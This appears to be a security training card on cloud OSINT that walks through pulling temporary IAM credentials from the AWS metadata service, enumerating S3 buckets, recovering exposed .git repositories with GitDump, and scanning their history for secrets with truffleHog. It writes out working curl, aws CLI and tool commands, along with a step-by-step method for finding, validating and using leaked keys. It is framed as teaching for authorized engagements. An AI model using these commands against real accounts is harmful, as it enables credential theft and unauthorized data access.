AWS S3 Bucket OSINT Enumeration: Public Bucket Discovery and Sensitive Data Identification

forensic_file_artifacts Difficulty 1–5 30 min certifiable

Theory

Why This Matters

The IMDS-to-S3-to-Git intelligence chain represents one of the most impactful credential exposure pathways in cloud environments. In the 2019 Capital One breach, an SSRF vulnerability allowed access to the AWS Instance Metadata Service (IMDS), yielding temporary IAM credentials that were used to enumerate and exfiltrate over 100 million customer records from S3. Beyond direct SSRF exploitation, threat intelligence analysts find IMDS-sourced credentials appearing in public breach databases, Pastebin dumps, and GitHub repositories — uploaded accidentally by developers who logged cloud environment variables. For investigators, the intelligence value lies in the chain: a single credential leak exposes not just one bucket but potentially entire code repositories, additional credential stores, and development secrets. This chain is also the starting point for assessing an organization's cloud security posture in authorized red team engagements.

Core Concept

The AWS Instance Metadata Service (IMDS) is an HTTP endpoint available to every EC2 instance at the link-local address 169.254.169.254. It provides instance identity documents, user data, and most critically, temporary IAM credentials associated with the instance's attached IAM role. These credentials are available at http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME without any authentication. IMDSv2 (the hardened version) requires a session token obtained via a PUT request before GET requests to credential endpoints, but many instances still run IMDSv1 due to application compatibility.

When IMDS credentials appear in breach data or public repositories, they arrive as a triplet: AccessKeyId, SecretAccessKey, and Token (the session token marking them as temporary STS credentials). Before any active use, analysts validate the credential with aws sts get-caller-identity — a read-only, low-risk API call that returns the IAM identity without touching any data. This is standard operational practice: it confirms credential validity and reveals the IAM role name and account ID, which guides further enumeration.

S3 bucket enumeration with recovered credentials uses aws s3 ls to list buckets the role can access. Even roles with limited policies may have s3:ListAllMyBuckets or s3:GetObject on specific paths. The key pivot is discovering S3 buckets containing git repositories — either raw .git directories uploaded by CI/CD pipelines, or .bundle files created by git bundle create. A .git directory in S3 can be downloaded and restored to a full repository with git clone.

Exposed .git directories on web servers are a parallel discovery path. When a developer deploys by uploading their entire project directory including the .git folder, GET /.git/config returns the git remote URL, branch structure, and sometimes credentials. GitDump automates extraction: it fetches /.git/HEAD, /.git/config, /.git/COMMIT_EDITMSG, and all pack files, then reconstructs the repository locally. truffleHog scans recovered git history for high-entropy strings and known credential patterns across every commit, not just the current HEAD.

Technical Deep-Dive

# IMDSv1 credential retrieval (for authorized testing / understanding the exposure)
# Step 1: Discover attached IAM role name
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Step 2: Retrieve temporary credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Returns JSON with AccessKeyId, SecretAccessKey, Token, Expiration

# IMDSv2 (token-based):
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" 
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" 
  http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME

# Credential validation (ALWAYS first step — read-only, safe)
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

aws sts get-caller-identity
# Returns: Account, UserId, Arn — confirms validity and reveals role name

# S3 enumeration with recovered credentials
aws s3 ls                        # List all accessible buckets
aws s3 ls s3://bucket-name/      # List bucket contents
aws s3 ls s3://bucket-name/ --recursive | grep -E '.git/|.bundle$|.tar.gz$'

# s3scanner: unauthenticated bucket permission assessment
pip install s3scanner
s3scanner scan --bucket company-backup
# Reports: exists, listable, readable, writable (without credentials)

# GitDump: extract exposed .git directory from web server
git clone https://github.com/Ebryx/GitDump.git
python3 GitDump/gitdump.py -u https://target.com/.git/ -o recovered_repo/
# Then restore as a git repo:
cd recovered_repo && git checkout -- .

# truffleHog: scan recovered git history for secrets
trufflehog git file://./recovered_repo/ --json | 
  python3 -m json.tool | grep -E '"DetectorName"|"Raw"' | head -40

# GitHub organization-wide secret scan (authorized)
trufflehog github --org=target-org --token=$GITHUB_TOKEN --json | 
  python3 -m json.tool | grep -E '"DetectorName"|"Repository"|"Raw"'

# Parse IMDS credential JSON from a breach dump entry
import json, datetime, re

raw = ''{
  "Code": "Success",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQ3EXAMPLE12345",
  "SecretAccessKey": "wJalrXUtnFEMI/EXAMPLE/bPxRfiCYEXAMPLEKEY",
  "Token": "AQoXnyc4lcK4w==...",
  "Expiration": "2024-11-15T18:22:30Z"
}''

creds = json.loads(raw)
exp = datetime.datetime.fromisoformat(creds["Expiration"].replace("Z", "+00:00"))
now = datetime.datetime.now(datetime.timezone.utc)
is_expired = now > exp
key_type = "temporary (STS/role)" if creds["AccessKeyId"].startswith("ASIA") else "long-term (IAM user)"
print(f"Key type  : {key_type}")
print(f"Expired   : {is_expired} (expiry: {exp})")
# ASIA prefix = temporary credentials from STS AssumeRole / IMDS
# AKIA prefix = long-term IAM user credentials (no expiry)

Intelligence Collection Methodology

Search breach data and public repositories: Query haveibeenpwned API for the organization's domain to identify known breaches. Search GitHub for ASIA (temporary AWS key prefix) with org:target-org scope. Use theHarvester to enumerate the organization's email domain, then cross-reference against credential leak databases.
Validate any discovered credentials safely: Set AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN environment variables and run aws sts get-caller-identity. This single read-only call confirms validity without modifying any resources. Log the IAM ARN returned for documentation.
Enumerate accessible S3 buckets: Run aws s3 ls with the recovered credentials. For each bucket, run aws s3 ls s3://bucket-name/ --recursive and grep for .git/, .bundle, .env, id_rsa, *.pem, *.key indicators.
Download and restore any discovered git repositories: Use aws s3 sync s3://bucket-name/.git/ ./recovered.git/ then git clone recovered.git/ restored_repo/. For web-exposed .git directories, use GitDump to reconstruct the repository from HTTP-accessible objects.
Scan all recovered git history: Run truffleHog over the entire git history (trufflehog git file://./restored_repo/) to identify secrets committed at any point in the repository's history, not just the current HEAD. Git history commonly contains credentials deleted from working files but still present in past commits.
Map the IAM permission boundary: Use Pacu (AWS exploitation framework, authorized use) or enumerate manually with aws iam get-role --role-name ROLE_NAME and aws iam list-role-policies to understand what the recovered role could access. This defines the scope of potential exposure.
Enumerate additional secret stores: From git history, extract any references to AWS Secrets Manager ARNs or SSM Parameter Store paths. Attempt retrieval with the recovered credentials: aws secretsmanager get-secret-value --secret-id SECRET_ARN.
Document the full chain: Record each hop: breach source → credential type (IMDS temporary vs IAM long-term) → IAM role ARN → accessible buckets → discovered repositories → secrets found in history. This chain of evidence is essential for incident reporting.

Common Intelligence Collection Errors

Using recovered cloud credentials for active enumeration before validation: Running broad enumeration commands (e.g., aws s3 ls --recursive across all buckets) with unvalidated or expired credentials generates IAM API calls that appear in CloudTrail logs and may trigger security alerts. Always validate with aws sts get-caller-identity first, then scope enumeration to the minimum necessary.
Treating AKIA and ASIA key prefixes identically: AKIA prefixes indicate long-term IAM user credentials with no automatic expiration — extremely high severity. ASIA prefixes indicate temporary STS credentials with a defined expiration (visible in the Expiration field). Misclassifying one as the other leads to incorrect severity assessment.
Scanning only HEAD of a recovered git repository: The credential that caused a breach was almost certainly deleted from the current HEAD. truffleHog's value is specifically in scanning every commit across all branches. git log --all --oneline and git stash list reveal additional commits and stashes to scan.
Missing .git directory exposure because it returns 403 on listing: Web servers may forbid directory listing of /.git/ while still serving individual files. Always test GET /.git/HEAD and GET /.git/config directly, as these files are frequently accessible even when directory listing is disabled.
Overlooking user data as a credential source: The IMDS user-data endpoint (/latest/user-data) contains the instance initialization script, which developers frequently embed with environment variables including credentials. This is a separate endpoint from the IAM credentials endpoint and is often overlooked.
Assuming s3scanner output is definitive: s3scanner tests a fixed set of permissions (list, read, write). IAM policies may allow specific object-level operations (e.g., s3:GetObject on specific paths) that s3scanner's bucket-level checks do not reveal. Manual testing of specific paths is required after s3scanner flags a bucket.

NICE Framework Alignment

Code	Knowledge/Skill/Task Statement	How This Card Develops It
K0058	Knowledge of network protocols	Understanding HTTP link-local addressing for IMDS access and AWS S3 REST API structure for bucket enumeration
K0145	Knowledge of security assessment approaches	Executing a structured IMDS-to-S3-to-Git credential intelligence chain with defined validation and documentation steps
K0272	Knowledge of network security architecture	Mapping how IAM roles, instance profiles, temporary STS credentials, and S3 bucket policies interact to define the cloud credential attack surface
K0427	Knowledge of encryption algorithms	Distinguishing credential types by prefix (AKIA vs ASIA) and understanding STS token expiration as a security control; recognizing high-entropy string signatures that truffleHog uses to identify secrets
S0040	Skill in identifying and extracting data of interest from various sources	Extracting credentials from breach data, git history, and S3 bucket contents using truffleHog, GitDump, and aws CLI
T0569	Apply and utilize authorized cyber capabilities to achieve objectives	Deploying s3scanner, GitDump, truffleHog, and AWS CLI in authorized cloud intelligence collection engagements